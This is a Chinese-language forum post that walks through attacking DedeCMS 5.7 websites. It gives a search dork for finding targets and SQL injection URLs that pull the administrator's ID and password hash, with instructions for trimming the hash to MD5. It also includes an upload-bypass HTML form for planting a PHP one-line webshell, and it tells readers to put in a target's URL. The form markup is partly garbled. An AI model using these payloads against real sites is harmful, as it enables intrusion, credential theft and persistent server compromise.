请选择 进入手机版 | 继续访问电脑版

dedecms5.7最新注入和上传漏洞 [复制链接]

sinochao 2013-9-6 13:10:21 查看全部 使用道具 举报 回复

版权信息:站内会员分享作品,仅供学习与参考,版权为原作者所有。
发布时间:2012-4.26
发布作者:佚名

漏洞类型:注入漏洞、上传漏洞

漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

  注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
aq-dede001-1.png
  然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,
aq-dede001-2.png
  然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
aq-dede001-3.png
  然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

  /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码
aq-dede001-4.png
  得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5



  上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

  只要登陆会员中心,然后访问页面链接

  “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

  如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

 于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

<form action="=../dialog/select_soft_post]

<[/url">http://www.51riyu.com/plus/carbu ... t&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>



把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。

全部评论/0 条

只有登录之后才可以评论,请点击这里进行登录

0关注

0粉丝

25作品

发布作品
加入收藏 我要分享

分享到微信

打开微信扫一扫即可将网页分享至微信

分享到论坛或者博客

复制
作者的其他作品查看全部
快速回复 返回顶部 返回列表